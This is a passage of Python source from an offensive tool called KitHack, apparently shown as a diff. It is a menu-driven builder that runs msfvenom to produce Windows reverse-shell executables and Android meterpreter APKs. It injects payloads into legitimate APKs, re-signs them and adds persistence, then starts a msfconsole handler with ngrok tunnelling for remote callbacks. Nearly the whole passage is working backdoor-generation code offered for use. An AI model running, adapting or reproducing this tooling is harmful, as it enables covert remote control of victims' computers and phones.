Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/metsvc_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '13': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '14': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/shell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif sys == '03': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} android/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} android/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} android/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} android/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} android/shell/reverse_http'.format(WHITE, YELLOW)) - print ('{0}[06]{1} android/shell/reverse_https'.format(WHITE, YELLOW)) - print ('{0}[07]{1} android/shell/reverse_tcp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - - elif pay == '02': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 